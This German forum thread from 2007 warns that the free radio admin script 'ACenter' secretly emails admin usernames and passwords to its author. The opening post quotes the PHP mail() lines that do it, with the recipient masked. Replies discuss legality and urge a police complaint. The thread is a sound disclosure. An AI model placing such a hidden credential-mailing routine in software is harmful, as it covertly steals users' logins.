1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen

Vorsicht: Script „ACenter“ spioniert...

Dieses Thema im Forum "Internetradio allgemein" wurde erstellt von ichwars, 15. Januar 2007.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. ichwars

    ichwars Benutzer

    Gleich vorweg ich will hier keine Hetzkampagne starten und ich bitte alle um sachliche Beiträge!!!!
    Dieser Thread soll lediglich zur Aufklärung dienen.

    Es geht um ein sogenanntes Radio Webtool, auch genannt ACenter.

    Zum einen wird man bei jedem Login (Script liegt dabei auf eigenem Webspace) in den Adminbereich auf die Seite des Scriptinhabers weitergeleitet, wo dann nach Updates geschaut wird und ob die Lizenz noch gültig ist. Frag sich hier schon mal, welche Lizenz eigentlich????

    Dieses Script kann man sich kostenlos von seiner Webseite herunter laden.

    Damit könnte man ja zur Not noch leben, aber die größte Frechheit an diesem Script ist das der Scriptinhaber sich folgende Daten per E-Mail schicken (und zwar jedes mal wenn man den Adminzugang bearbeitet):

    - Domainname inkl. Pfad zum Script,
    - Adminname,
    - Adminpasswort,

    Als ich den Scripter darauf hin zur Rechenschaft ziehen wollte bekam ich folgende Antwort (Auszug):

    noch ein kleiner Script auszug zur besagten Stelle (email Adresse verfälscht):


    Code:
    		$empfaenger = "**********@gmx.li";
      		$betreff = "$a7 login daten";
      		$text = "NICK: $member_nick | PW: $pw_neu";
      		mail($empfaenger, $betreff, $text,"From: $a7 <$member_mail>");
    		}
    	echo "<p align=\"center\"><b><font face=\"Verdana\" size=\"4\">Passwort änderung erfolgereich.</font></b></p>";

    im weiteren Gespräch wurden dann durch Script ausgespähte Daten ohne meine vorherige Zustimmung öffentlich in seinem "Support"-Forum gepostet.:wall:

    Aufforderung der Löschung aller gespeicherten und ausgespähten Daten, Kahm der Scriptinhaber bisher nicht nach. Sondern verlangt ein persönliches Schreiben per Post und danach behält er sich eine Bedenkzeit von 14 Tagen vor, ob er die Daten dann löscht oder auch nicht.:mad: :wall:


    So nun kann sich jeder seine Meinung zum besagten Script machen.
    Von mir hat besagter Scriptinhaber eine schriftliche Aufforderung zur Löschung aller ausgespähten Daten, mit Androhung auf Strafverfolgung erhalten.

    Sollten weitere User dieses Script nutzen Rate ich jedem sein Adminpasswort nur direkt in der Datenbank zu ändern, bzw auf andere Scripte auszuweichen.

    greetz
     
  2. DarkSoul

    DarkSoul Benutzer

    AW: Vorsicht: Script „ACenter“ spioniert...

    das mit der sache der lizenz ist so eine merkwürdige sache da muss ich dir recht geben...

    andererseits ist es verständlich das einige programm/skriptautoren gerne wissen würden, wieviele leute letztendlich ihre entwicklung nutzen.

    von daher sehe ich sowas in der art eig. als normal an, allerdings nicht in diesem umfang.
    beispiel openoffice (ok sind ein paar mehr entwickler als nur einer aber dennoch):
    da bekommt man beim start die option einfach nein zur zählung zu sagen wenn man mag...

    ich habe mal versucht über "acenter" was herauszubekommen, google war da nicht so sehr erfolgreich :(

    kannst du mir bitte den link zum download per PM schicken?
    dann schau ich mir des mal an
     
  3. ichwars

    ichwars Benutzer

    AW: Vorsicht: Script „ACenter“ spioniert...

    abend,

    stimmt gebe ich dir recht, aber es darf nicht sein das sich Scripter gleich den Link und die Zugangsdaten zum Adminbereich schicken lassen und das ohne irgend einen Hinweis. Das ist nunmal nach meinem Rechtsverständnis (wo mir mein Anwalt auch recht gibt) ilegal.
     
  4. Gelb

    Gelb Benutzer

    AW: Vorsicht: Script „ACenter“ spioniert...

    Ausspähung von privaten Zugangsdaten. Rechtswidrig.
    Davon ganz abgesehen: wenn der Typ wirklich so geschrieben hat, wie Du ihn oben zitiert hast, dann teile ihm doch bitte einen schönen Gruß von mir mit, er möge erstmal deutsch lernen, bevor er solche Töne anschlägt.
     
  5. DarkSoul

    DarkSoul Benutzer

    AW: Vorsicht: Script „ACenter“ spioniert...

    mhn, also wenn man das script denn wenigstens runterladen könnte...

    Die 1.6 Server Version gibt es nur per eMail/MSN :eek:
    und die vorigen Versionen gibt es nur nach Registrierung... :mad:

    Ne also, da trau ich mich nicht ran, bekomme schon genug Spam Mails :rolleyes:

    dann bevorzuge ich wirklich die Aratix-Scriptsammlung, die ist um einiges einfacher zu bekommen und kann so wie ich das jetzt auf die schnelle verglichen habe auch mehr.
     
  6. croydon_de

    croydon_de Gelöschter Benutzer

    AW: Vorsicht: Script „ACenter“ spioniert...

    Und die ist mit Sicherheit auch keine "nach-Hause-telefonieren" Software.

    Das mit den Lizenzdaten kann ja noch sein und angehen, wenn z.B. eine Vorab-Version kostenlos vertrieben wird und eine spätere Version mit größerem Funktionsumfang dann kostenpflichtig vertrieben werden soll.
    Das mit dem Admin-Zugang ist aber definitiv nicht korrekt und das Veröffentlichen der so gesammelten Daten schon zweimal nicht.

    Was das soll ist eigentlich sonnenklar - mit den erhaltenen Zugangsdaten kann sich der "Entwickler" nämlich z.B. selber einloggen und das Skript unbrauchbar machen (indem er dann das Passwort für den Admin-Zugang verändert), wenn die "Lizenz" denn mal abgelaufen sein sollte.

    Alleine schon die Vorgehensweise würde mir eindeutig sagen "Finger weg!" - das taugt nichts.

    Gruß,
    Croydon
     
  7. Commander_Keen

    Commander_Keen Benutzer

    AW: Vorsicht: Script „ACenter“ spioniert...

    Oder nen schönen "FTP Server" installieren, der mit viel Ärger verbunden sein kann. Die meisten User nutzen meist das gleiche Passwort für den Shellzugriff.

    Gruß
    Keen
     
  8. DaboUser

    DaboUser Benutzer

    AW: Vorsicht: Script „ACenter“ spioniert...

    MEIN TIPP:

    UMGEHEND STRAFANZEIGE STELLEN! Kostet nix ausser 10 Min sitzen und dann unterschreiben.
     

Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen